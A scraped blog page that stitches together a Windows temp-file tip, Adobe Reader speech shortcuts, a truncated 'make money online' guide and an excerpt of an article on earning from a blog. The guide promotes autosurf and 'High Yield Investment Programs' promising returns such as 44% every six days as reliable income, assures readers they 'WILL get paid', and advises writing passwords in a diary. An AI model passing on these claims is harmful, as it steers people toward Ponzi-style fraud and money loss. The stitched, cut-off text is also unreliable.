Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.<br />
<br />
<br />
</b><h2 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 20px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>make ur pdf files to speak</b></i></h2><b><br />
make ur pdf files to speak<br />
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher<br />
<br />
ctrl+shift+b ---->to hear the whole topic<br />
ctrl+shift+v ---->to hear the page</b><br />
<b><br />
</b></div></div></b></span><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-68388279549240271552009-10-19T21:55:00.000-07:002009-10-20T01:57:34.790-07:00make money online<span class="Apple-style-span" style="color: #666666; font-family: Verdana, arial, tahoma; font-size: 12px;"></span><br />
<div align="justify"><span class="mainbody"><b><span style="color: #ff9933; font-family: Verdana;"><span class="Apple-style-span" style="font-size: x-large;">How To Make Money From The Internet</span></span></b></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;"><br />
A guide to the easiest ways of how to make money from the internet armed with a computer and a bank account.<br />
<br />
<b>Ways to Get Money from the Internet</b><br />
The basic way to get money from the Internet is to promote products via ads. These ads are placed on your own website or on someone elses such as a search engine in the form of sponsored ads.<br />
<br />
The product might be your own product or someone elses where you participate as an affiliate and receive commissions on sales.<br />
<br />
How Much Money Could You Make from the Internet ?<br />
With your own product you would make a profit on each sale based on your sale price minus the cost of materials, shipping and other expenses.<br />
<br />
<b>Own Product Example</b><br />
You market an eBook priced at $49 for download from your website and use a 3rd party payment provider such as ClickBank.<br />
<br />
Each month you have 1,000 visitors to your website and a sales conversion rate of 5% so your revenue is $2,450 per month.<br />
<br />
Now consider expenses like web hosting at $10 per month and credit-card processing fees of 8% giving costs of $206 per month.</span></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;">So, in this example your profits are $2,234 monthly.</span></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;"><b>Affiliate Marketing Example</b><br />
You have a website about fishing where you review equipment and have product links carrying your affiliate tracking code.<br />
<br />
Your website gets 10,000 visitors a month and 10% click on a product link. 10% of these people purchase an average of $100 of merchandise. You get paid 5% commission.<br />
<br />
So 1000 people click and 100 buy a product and you are paid 5% of $10,000 in commission.<br />
<br />
You only have web hosting costs of $10 per month to deduct.</span></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;">This nets you $490 per month profit.</span></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;"><b>Own Product or Affiliate Marketing ?</b><br />
From the above examples it is clear which is the most profitable approach to take. However, you may struggle to develop your own product, yet you can immediately access 1000's of other people's products via the affiliate marketing route.<br />
<br />
The affiliate commission on eBooks is generally far higher than physical goods so you can make good money marketing other people's eBook products rather than developing your own.<br />
<br />
For physical products, successful affiliate marketers generally create sites that recommend the products such as sport's equipment. If the price of the products is high, you can make good money.</span></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;"><b>How to Make as Much Money as Possible</b><br />
Which ever route is taken you need to balance the following factors for maximum profits:<br />
<br />
<b>Maximize Visitors</b><br />
The more people that see your ads, the more will click and buy. Some ways to maximize visitors are:<br />
<br />
Add more content and pages to your website<br />
Optimize your website for search engines<br />
Get more links to your website<br />
Advertise your URL in Google adwords and pay per click search engines<br />
Advertise your URL offline in classified ads<br />
Maximize Click-throughs<br />
Pre-sell products with reviews, articles and related information then provide links in easy to find places.</span></span><br />
</div><div align="justify"><span class="mainbody"><span style="color: #006699; font-family: Verdana;"><b>Maximize Profit</b><br />
Adjust the selling price to balance sales volumes at the point where maximum profit is produced.<br />
<br />
Minimize costs by reducing shipping costs and administration costs. One of the best ways to do this is to market digital products such as software and e-Books that don't require physical shipping.<br />
<br />
Maximize commission. Look for large co</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: #666666; font-family: Verdana, arial, tahoma; font-size: 12px;"></span></span></span><br />
</div><span style="color: #006699; font-family: Verdana;"><h2 style="color: #ff9933; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span style="color: #ff9900;"><span class="Apple-style-span" style="font-size: x-large;">Ways to make money on the Internet</span></span></h2><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;"><span class="mainbody"><b>First, you need some 'tools'.</b></span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="mainbody">Open FREE Internet banking accounts to spend and receive payment online.<br />
Disposable FREE email addresses.<br />
An 'always online' connection to the Internet.<br />
A dedicated credit card for the Internet.</span></span><span style="font-family: Verdana;"><span class="mainbody"><span style="color: #006699;"><br />
<img align="right" alt="Ways to make money on the Internet" border="0" height="214" src="http://www.finalsense.com/learning/image/webhosting.jpg" style="border-bottom-color: rgb(104, 136, 152); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(104, 136, 152); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(104, 136, 152); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(104, 136, 152); border-top-style: solid; border-top-width: 1px;" width="237" /></span></span></span><br />
</div><h5 align="justify"><span style="color: #006699; font-family: Verdana;"><span class="mainbody"><b>Second, you need some income.</b></span></span></h5><div align="justify"><span style="font-family: Verdana;"><a href="http://www.alientrust.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">AlienTrust</span></a><span style="color: #006699;"> <span style="font-size: x-small;">v3.0</span> Manual surf 25 sites daily to earn 10% daily for 13 days ( less 4% charge ).<br />
$8 </span><span class="mainbody"><a href="http://www.e-gold.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">e-gold</span></a></span><span style="color: #006699;"> Ad-buy units to upgrade and advertise a page like this one. Free members can earn about $8 in a month by daily surfing<span style="font-family: Arial, Helvetica, sans-serif;"> and then use their earnings to upgrade.</span><span class="mainbody"><br />
</span></span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://www.blackgold-surf.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Black Gold Surf </span></a><span style="color: #006699;"> is an autosurf program earning 12% of your $5+ stake daily for 12 days. So after 12 days you can withdraw your stake money plus 44% profit as long as you view 12 advertising pages daily that load automatically. Takes about 5 minutes a day. Deposits in </span><span class="mainbody"><a href="http://www.e-gold.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">e-gold</span></a></span><span style="color: #006699;"> in $5 increments and you need to upgrade before you surf, otherwise you have to wait till the next day. I buy upgrades every 6 days (max allowed $2,000) and so make 44% profit every 6 days. The site has been running since December 05 and has over 7,000 active members (22Feb06) growing by over 300 a day.</span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://vascoinvest.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Vasco Investments</span></a><span style="color: #006699;"> - running since Dec05 and paying 1.8% to 3% per working day or about 45% to 86% compounded daily per month, depending on the amount deposited. Deposits start at $10 e-gold up to six figures. Withdrawals are on a daily basis and paid back into your e-gold account in minutes but usually within 12 hours. As of 22Feb06 there are 25,421 investors. </span><span style="font-size: x-small;"><a href="http://www.finalsense.com/learning/fun_jobs_review.htm" style="color: #ff9933; text-decoration: none;"><span style="color: #006699;">proof of a test withdrawl</span></a></span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://www.finalsense.com/learning/fun_jobs_review.htm" style="color: #ff9933; text-decoration: none;"><span style="color: #006699;">High Yield Investment Programs</span></a><span style="color: #006699;"> - HYIP, paying 20%+ interest after 1 to 4 days. So invest, say, $1,000 and collect $1,200 days later. Or do a 'rolling buy' and invest $250 each day for four days, repeat every fifth day and collect $50 profit each day thereafter on the same $1,000.<br />
Minimum buy is $1 to $10 to prove to yourself it works before committing a real investment.<br />
It is prudent to spread your money over many HYIP sites and spread the risk.</span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://www.class-act-clicks.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Class Act Clicks</span></a><span style="color: #006699;"> - A site run by Brian and Jessi, so will be honest and good. A great PTS ( paid to search ), PTC ( paid to click ), PTR ( paid to read ) and PTP ( paid to promote ) program and with a payout threshold of $9. Points also convert to cash which is a pleasant change. I have been paid twice by random payouts as well - that is, a payment into my PayPal account without even asking for payment! Great!<br />
</span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://www.finalsense.com/learning/fun_jobs_review.htm" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Here is a tutorial on how to make a valid search</span></a><span style="color: #006699;"> . It will take longer than the 10-40 seconds shown to finish loading three pages but if the advertiser doesn't get paid, he wont send the links in the future.</span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span class="mainbody"><a href="http://www.itpaystolearn.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">ItPaysToLearn</span></a><span style="color: #006699;"> is fun. Apart from earning from reading ' V-mails', by visiting sites and taking up offers, you have to get enough points each month answering quiz questions to get paid. You are then able to sell your points. I enjoy using this program and this is another program that really does pay. Sadly, some don't. I upgrade to gold level and so do well, but you can still earn several dollars a month as a free member.</span></span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://www.real-cashs.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Real-Cashs</span></a><span style="color: #006699;"> - another PTS program with a $2 minimum payout a month and paid very quickly.</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="mainbody">Trickle income like this builds up a bank balance and gives you confidence.</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><b>Higher Payouts</b>.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;">Normally I avoid very high payout programs where it sometimes takes a year to reach the minimum by which time the site may have vanished!</span><br />
</div><div align="justify"><span style="font-family: Verdana;"><a href="http://www.rpoints.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Rpoints</span></a></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span style="color: #006699;">Aimed at UK/Euro surfers comparing prices of goods. You can buy almost anything at the best retail price and then get an added discount with </span><a href="http://www.rpoints.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Rpoints</span></a><span style="color: #006699;">. Go to the page called 'recurring' where comparing prices with Kelkoo and others earns about 2p to 6p a click up to a max of about £1 a day. Ultra-cautious about awarding points, </span><a href="http://www.rpoints.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Rpoints</span></a><span style="color: #006699;"> take a week or more to check, then credit, your points and then a month or more to validate them before you can cash in. A good forum explains all this. But, once the ball is rolling and you're clicking every day, the cash rolls into PayPal at 100 points (£1) minimum a time and in £sterling too so you can have dollar and sterling PayPal accounts to save on exchange rates.</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="mainbody">You WILL get paid with these programs; about $35 a month for just these PTC/PTS programs and there are dozens more to choose from. Join up, add to your favourites or put an icon on your desktop by dragging on a links page for each program and visit the sites at intervals through the day and earn a bit each time. It soon adds up.</span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><b><span style="color: #006699;">TIPS - </span></b><span style="color: #006699;"><br />
1. Right click on the log-in page for each program and save a shortcut link to your desktop, <i>or</i>, Add to your Favourites in a new folder, named Daily, for instance. <i>Much</i> easier to remember your daily earning sites by double clicking on the icons or links.<br />
<br />
2. Write the address and log-in details for each site in the back of your diary. It is easy to forget your user name and password and you can continue to earn money on another pc when away from home.<br />
<br />
3. Get into the habit of regular visits. Most sites will cancel your account if you don't make use of it and any money earned will be lost.</span></span><br />
</div><div align="justify"><span style="color: #006699;"><span style="font-family: Verdana; font-size: x-small;"><span class="mainbody"><b>Third, make a web site of your own and get advertisers on it.</b></span></span><span style="font-family: Verdana;"><span class="mainbody"></span></span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;">The final group of earning programs can be placed on your own web site.<br />
First you need a website with content interesting enough to attract visitors.<br />
Think of a subject that you know a lot about - you, your family, your job, your hobby - whatever it is, focus on it and provide detailed information; facts, figures. Try to make your web site the definitive source of information on your chosen subject.</span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span style="color: #006699;">With a web site designed you need a domain name and a hosting service. It is like an address to the house where your web site lives. </span><span class="mainbody"><span style="color: #006699;">I use </span><a href="http://easily.co.uk/" style="color: #ff9933; text-decoration: none;" target="fromagentwin"><span style="color: #006699;">Easily</span></a><span style="color: #006699;"> to buy my domain names and </span><a href="http://secure.cirtexhosting.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Cirtex</span></a><span style="color: #006699;"> to host them, both companies give excellent service and support.</span></span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;">Promote your website using the points earned from working the autosurf, PTS, PTR and PTC you joined above in section two.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;">Once you have a web site with solid content you have a 'product' to sell. Many of the top programs will not accept you as an affiliate unless you have a web site of substance.</span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span class="mainbody"><span style="color: #006699;">A convenient place to start is </span><a href="http://clkuk.tradedoubler.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">TradeDoubler</span></a><span style="color: #006699;"> . where you can join up for free to any of dozens of schemes under one 'roof' . All affiliate schemes have a minimum payout limit of around $50 so grouping schemes together as with </span><a href="http://clkuk.tradedoubler.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">TradeDoubler</span></a><span style="color: #006699;"> . [aimed at European web sites] and Commission Junction [aimed at North America but covering the world] means that you can get a cheque earlier.</span></span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span class="mainbody"><span style="color: #006699;">Lots of companies would love you to join them as an affiliate and will pay you a commission when your visitors buy some of their products. It makes sense to join up with companies compatible with your site.</span><a href="http://www.amazon.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Amazon</span></a><span style="color: #006699;"> sell a lot more than just books now and pay 5% to 7.5% commission by targeting specific books with a link from your site.</span></span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span class="mainbody"><a href="http://www.bravenet.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">Bravenet</span></a><span style="color: #006699;"> has a lot of free goodies to add to your web site to attract more visitors and can help in setting up and hosting a web site. They also offer 50mb of free space on their servers to store your password protected back-up files and sensitive data.<br />
</span></span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="mainbody">The star ad payer is <b>Google Adsense</b> (see ads above and right). They pay for clicks and pay very well and cleverly match their ads to the content of your page and the nationality of the surfer. They are choosey about the sites that can join and demand a reasonable standard of content. Click on the button to sign up...</span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span class="mainbody"><span style="color: #006699;">Slide or Glide In ads are the latest medium and build income fast from your web site. I use </span><a href="http://www.glidenetwork.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">GlideNetwork</span></a><span style="color: #006699;">. The small ad windows load onto your page for 15 seconds and then automatically disappear. Rates vary but they pay for CPC and CPM with a payout limit of >$5.00 to Paypal. Not affected by popup killers as yet so impressions are good.<br />
<br />
Pop-up windows are better selling tools than banners and</span><a href="http://www.popuptraffic.com/" style="color: #ff9933; text-decoration: none;" target="_blank"><span style="color: #006699;">PopupTraffic.com</span></a><span style="color: #006699;"> will pay you $3 to $4/1000 impressions depending on whether the popup is in front, behind or on exit or all three for $11/1000, the choice is yours. This is the best you will get on the net and they pay monthly without fail. Popup killer browsers will reduce your income but they have introduced a new 'layer' glide in ad when meeting a popup blocker that pays $3 cpm. A busy site will still earn more than the $25 minimum for a cheque to be sent each month.</span></span></span><br />
</div><div align="justify"><span style="font-family: Verdana;"><span class="mainbody"><span style="color: #006699;">Remember, these are all free to join; you have no outgoings (apart from HYIP's) other than your normal internet connection which you have anyway. To be perfectly frank, the only downside to these deals is that it takes up your time to organise the links, and your browser and/or web site will run a bit slower while advertising banners load.<br />
<br />
The Internet is fast changing - please let us know if a good deal comes along or if you find a crooked deal; contact </span><span style="color: #006699;">and we will check it out and give it an unbiased opinion.</span></span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: #666666; font-family: Verdana, arial, tahoma; font-size: 12px;"></span></span></span><br />
</div><span style="color: #006699; font-family: Verdana;"><div align="justify"><b><span style="color: #ff9900; font-family: Verdana;"><span class="Apple-style-span" style="font-size: x-large;">How to Make Money From Your Blog</span></span></b><span style="color: #006699; font-family: Verdana; font-size: x-small;"><br />
</span><span style="color: silver; font-family: Verdana;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">StevePavlina.com was launched 19 months ago. 12 months ago it was averaging <strong>$4.12/day</strong> in income. Now it brings in over <strong>$200/day</strong>. I didn’t spend a dime on marketing or promotion. In fact, I started this site with just $9 to register the domain name, and everything was bootstrapped from there. Would you like to know how I did it?</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">This article is seriously long (over 7300 words), but you’re sure to get your money’s worth (hehehe). I’ll even share some specifics. If you don’t have time to read it now, feel free to bookmark it or print it out for later.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Do you actually want to monetize your blog?</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Some people have strong personal feelings with respect to making money from their blogs. If you think commercializing your blog is evil, immoral, unethical, uncool, lame, greedy, obnoxious, or anything along those lines, then don’t commercialize it.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If you have mixed feelings about monetizing your blog, then sort out those feelings first. If you think monetizing your site is wonderful, fine. If you think it’s evil, fine. But make up your mind before you seriously consider starting down this path. If you want to succeed, you must be congruent. Generating income from your blog is challenging enough — you don’t want to be dealing with self-sabotage at the same time. It should feel genuinely good to earn income from your blog– you should be driven by a healthy ambition to succeed. If your blog provides genuine value, you fully deserve to earn income from it. If, however, you find yourself full of doubts over whether this is the right path for you, you might find this article helpful: How Selfish Are You? (It talks about how to find the right balance between your needs and those of others.)</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If you do decide to generate income from your blog, then don’t be shy about it. If you’re going to put up ads, then <em>really</em> put up ads. Don’t just stick a puny little ad square in a remote corner somewhere. If you’re going to request donations, then <em>really</em> request donations. Don’t put up a barely visible “Donate” link and pray for the best. If you’re going to sell products, then <em>really</em> sell them. Create or acquire the best quality products you can, and give your visitors compelling reasons to buy. If you’re going to do this, then fully commit to it. Don’t take a half-assed approach. Either be full-assed or no-assed.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">You can reasonably expect that when you begin commercializing a free site, some people will complain, depending on how you do it. I launched this site in October 2004, and I began putting Google Adsense ads on the site in February 2005. There were some complaints, but I expected that — it was really no big deal. Less than 1 in 5,000 visitors actually sent me negative feedback. Most people who sent feedback were surprisingly supportive. Most of the complaints died off within a few weeks, and the site began generating income almost immediately, although it was pretty low — a whopping $53 the first month. If you’d like to see some month-by-month specifics, I posted my 2005 Adsense revenue figures earlier this year. Adsense is still my single best source of revenue for this site, although it’s certainly not my only source. More on that later…</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Can you make a decent income online?</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Yes, absolutely. At the very least, a high five-figure annual income is certainly an attainable goal for an individual working full-time from home. I’m making a healthy income from StevePavlina.com, and the site is only 19 months old… barely a toddler. If you have a day job, it will take longer to generate a livable income, but it can still be done part-time if you’re willing to devote a lot of your spare time to it. I’ve always done it full-time.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Can most people do it?</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">No, they can’t. I hope it doesn’t shock you to see a personal development web site use the dreaded C-word. But I happen to agree with those who say that 99% of people who try to generate serious income from their blogs will fail. The tagline for this site is “Personal Development for <em>Smart</em> People.” And unfortunately (or fortunately, depending on your outlook), smart people are a minority on this planet. So while most people can’t make a living this way, I would say that most smart people can. What if you don’t know whether or not you qualify as smart? Here’s a good rule of thumb: If you have to ask the question, you aren’t.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If that last paragraph doesn’t flood my inbox with flames, I don’t know what will. OK, actually I do.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">This kind of 99-1 ratio isn’t unique to blogging though. You’ll see it in any field with relatively low barriers to entry. What percentage of wannabe actors, musicians, or athletes ever make enough money from their passions to support themselves? It doesn’t take much effort to start a blog these days — almost anyone can do it. Talent counts for something, and the talent that matters in blogging is intelligence. But that just gets you in the door. You need to specifically apply your intelligence to one particular talent. And the best words I can think of to describe that particular talent are: <em>web savvy</em>.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If you are very web savvy, or if you can learn to become very web savvy, then you have an excellent shot of making enough money from your blog to cover all your living expenses… and then some. But if becoming truly web savvy is more than your gray matter can handle, then I would offer this advice: Don’t quit your day job.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Web savvy</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">What do I mean by web savvy? You don’t need to be a programmer, but you need a decent functional understanding of a variety of web technologies. Which technologies are “key” will depend on the nature of your blog and your means of monetization. But generally speaking I’d list these elements as significant:</span><br />
</div><ul><li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">blog publishing software</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">HTML/CSS</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">blog comments (and comment spam)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">RSS/syndication</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">feed aggregators</span><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;"><img align="right" border="0" height="107" src="http://www.finalsense.com/learning/image/lotsmoney.gif" width="192" /></span></strong><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">pings</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">trackbacks</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">full vs. partial feeds</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">blog carnivals (for kick-starting your blog’s traffic)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">search engines</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">search engine optimization (SEO)</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">page rank</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">social bookmarking</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">tagging</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">contextual advertising</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">affiliate programs</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">traffic statistics</span><br />
</div></li>
<li><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">email</span><br />
</div></li>
</ul><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Optional: podcasting, instant messaging, PHP or other web scripting languages.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I’m sure I missed a few due to familiarity blindness. If scanning such a list makes your head spin, I wouldn’t recommend trying to make a full-time living from blogging just yet. Certainly you can still blog, but you’ll be at a serious disadvantage compared to someone who’s more web savvy, so don’t expect to achieve stellar results until you expand your knowledge base.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">If you want to sell downloadable products such as ebooks, then you can add e-commerce, SSL, digital delivery, fraud prevention, and online databases to the list. Again, you don’t need to be a programmer; you just need a basic understanding of these technologies. Even if you hire someone else to handle the low-level implementation, it’s important to know exactly what you’re getting into.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">A lack of understanding is a major cause of failure in the realm of online income generation. For example, if you’re clueless about search engine optimization (SEO), you will probably cripple your search engine rankings compared to someone who understands SEO well. But you can’t consider each technology in isolation. You need to understand the connections and trade-offs between them. Monetizing a blog is a balancing act. You may need to balance the needs of yourself, your visitors, search engines, those who link to you, social bookmarking sites, advertisers, affiliate programs, and others. Seemingly minor decisions like what to title a web page are significant. In coming up with the title of this article, I have to take all of these potential viewers into consideration. I want a title that is attractive to human visitors, drives reasonable search engine traffic, yields relevant contextual ads, fits the theme of the site, and encourages linking and social bookmarking. Plus I want each article to provide genuine value to my visitors. So I do my best to create titles for my articles that balance these various needs. Often that means abandoning cutesy or clever titles in favor of direct and comprehensible ones. It’s little skills like these that help drive sustainable traffic growth month after month. Missing out on just this one skill is enough to cripple your traffic. And there are dozens of these types of skills that require decent web savvy to understand.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">This sort of knowledge is what separates the 1% from the 99%. Both groups may work just as hard, but the 1% is getting much better results for their efforts. It normally doesn’t take me more than 60 seconds to title an article, but a lot of mental processing goes into those 60 seconds. You really just have to learn these ideas once; after that you can apply them fairly routinely.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">Whenever you come across a significant web technology you don’t understand, look it up on Google or Wikipedia, and dive into it long enough to acquire a basic understanding of it. To make money from blogging it’s important to be something of a jack of all trades. Maybe you’ve heard the expression, “A jack of all trades is a master of none.” That may be true, but you don’t need to master any of these technologies — you just have to be good enough to use them. It’s the difference between being able to drive a car vs. becoming an auto mechanic. Strive to achieve functional knowledge, and then move on to something else. Even though I’m an experienced programmer, I don’t know how many web technologies actually work. But I don’t really care. I can still use them to generate results. In the time it would take me to fully understand one new technology, I can achieve sufficient functional knowledge to utilize several of them.</span><br />
</div><div align="justify"><strong><span style="color: #006699; font-family: Verdana; font-size: x-small;">Thriving on change</span></strong><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I would say that your greatest risk isn’t so much that you’ll make mistakes that will cost you. Your greatest risk is that you’ll miss opportunities. You need an entrepreneurial mindset, not an employee mindset. Don’t be too concerned with the risk of loss — be more concerned with the risk of missed gains. It’s what you don’t know and what you don’t do that will hurt you the worst. Blogging is cheap. Your expenses and financial risk should be minimal. Your real concern should be missing opportunities that could have made you money very easily. You need to develop antennae that can listen out for new opportunities. I highly recommend subscribing to Darren Rowse’s Problogger blog — Darren is great at uncovering new income-generating opportunities for bloggers.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">The blogosphere changes very rapidly, and change creates opportunity. It takes some brains to decipher these opportunities and figure out how to take advantage of them before they disappear. If you hesitate to capitalize on something new and exciting, you may simply miss out. Many opportunities are temporary. And every day you don’t implement them, you’re losing money you could have earned.</span><br />
</div><div align="justify"><span style="color: #006699; font-family: Verdana; font-size: x-small;">I used to get annoyed by the rapid rate of change of web technologies. It’s even more rapid than what I saw when I worked in the computer gaming industry. And the rate of change is accelerating. Almost every week now I learn about some fascinating new web service or idea that could potentially lead to big changes down the road. Making sense of them is a full-time job in itself. But I learned to love this insane pace. If I’m confused then everyone else is probably confused too. And people who only do this part-time will likely be very confused. If they aren’t confused, then they aren’t keeping up. So if I can be just a little bit faster and understand these technologies just a little bit sooner, then I can capitalize on some serious opportunities before the barriers to entry become too high. Even though confusion is uncomfortable, it’s really a good thing for a web entrepreneur. This is what creates the space for a college student to earn $1,000,000 online in just a few months with a clever idea. Remember this isn’t a zero-sum game. Don’t let someone else’s success make you feel diminished or jealous. Let it inspire you instead.</span><br />
